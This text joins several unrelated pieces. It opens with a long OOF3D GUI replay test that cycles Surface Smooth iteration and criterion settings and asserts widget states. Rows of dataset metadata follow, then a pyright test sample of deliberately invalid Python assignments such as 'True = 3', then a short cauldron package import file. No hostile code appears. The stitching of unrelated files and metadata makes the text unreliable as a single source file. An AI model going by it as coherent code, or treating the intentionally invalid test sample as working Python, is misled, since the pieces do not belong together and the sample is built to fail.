assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
# Selecting the microstructure '5color'
setComboBox(findWidget('OOF3D:Skeleton Page:Microstructure'), '5color')
checkpoint skeleton page sensitized
checkpoint skeleton page info updated
checkpoint skeleton page info updated
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '28')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((28,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Hide
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '24')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((24,))
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Hide
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '29')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((29,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '23')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((23,))
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
findMenu(findWidget('OOF3D:MenuBar'), 'File:Save:Python_Log').activate()
checkpoint toplevel widget mapped Dialog-Python_Log
findWidget('Dialog-Python_Log').resize(190, 95)
findWidget('Dialog-Python_Log:filename').set_text('skelpagesurfsmooth.log')
findWidget('Dialog-Python_Log:gtk-ok').clicked()
checkpoint OOF.File.Save.Python_Log
assert tests.filediff('skelpagesurfsmooth.log')
widget_0=findWidget('OOF3D')
handled_0=widget_0.event(event(gtk.gdk.DELETE,window=widget_0.window)) | 63.87746 | 161 | 0.8396 | 8,640 | 71,415 | 6.889699 | 0.041551 | 0.056546 | 0.051708 | 0.067264 | 0.958691 | 0.954542 | 0.944748 | 0.939389 | 0.938381 | 0.938381 | 0 | 0.039933 | 0.073584 | 71,415 | 1,118 | 162 | 63.87746 | 0.85981 | 0.014381 | 0 | 0.87135 | 0 | 0.029197 | 0.278765 | 0.084666 | 0 | 0 | 0 | 0 | 0.124088 | 0 | null | null | 0 | 0.000912 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
440b1e5e1ea330bdc10364b287379d7e2d438888 | 961 | py | Python | packages/pyright-internal/src/tests/samples/constants1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 4,391 | 2019-05-07T01:18:57.000Z | 2022-03-31T20:45:44.000Z | packages/pyright-internal/src/tests/samples/constants1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 2,740 | 2019-05-07T03:29:30.000Z | 2022-03-31T12:57:46.000Z | packages/pyright-internal/src/tests/samples/constants1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 455 | 2019-05-07T12:55:14.000Z | 2022-03-31T17:09:15.000Z | # This sample tests that the type checker flags certain values
# that cannot be deleted or assigned to.
# This should generate an error
True = 3
# This should generate an error
False = 4
# This should generate an error
None = True
# This should generate an error
__debug__ = 4
# This should generate an error
del True
# This should generate an error
del None
# This should generate an error
-3 = 2
# This should generate an error
[4] = [2]
# This should generate an error
[True] = [3]
# This should generate an error
(True) = 3
# This should generate an error
del -3
# This should generate an error
3 + 4 = 2
# This should generate an error
del 3 + 4
# This should generate an error
del -(4)
# This should generate an error
del __debug__
# This should generate an error
del {}
# This should generate an error
... = 3
# This should generate an error
del ...
# This should generate an error
(...) = 3
# This should generate an error
del ...
| 14.784615 | 62 | 0.705515 | 154 | 961 | 4.350649 | 0.181818 | 0.298507 | 0.537313 | 0.597015 | 0.843284 | 0.843284 | 0.597015 | 0.41194 | 0.41194 | 0.41194 | 0 | 0.024161 | 0.224766 | 961 | 64 | 63 | 15.015625 | 0.875168 | 0.727367 | 0 | 0.1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4453fdbf000f5801f56dbc110fe60e0baba414c7 | 173 | py | Python | cauldron/cli/sync/__init__.py | DanMayhew/cauldron | ac41481830fc1a363c145f4b58ce785aac054d10 | [
"MIT"
] | null | null | null | cauldron/cli/sync/__init__.py | DanMayhew/cauldron | ac41481830fc1a363c145f4b58ce785aac054d10 | [
"MIT"
] | null | null | null | cauldron/cli/sync/__init__.py | DanMayhew/cauldron | ac41481830fc1a363c145f4b58ce785aac054d10 | [
"MIT"
] | null | null | null | from cauldron.cli.sync import sync_io as io
from cauldron.cli.sync import files
from cauldron.cli.sync import comm
from cauldron.cli.sync.threads import send_remote_command
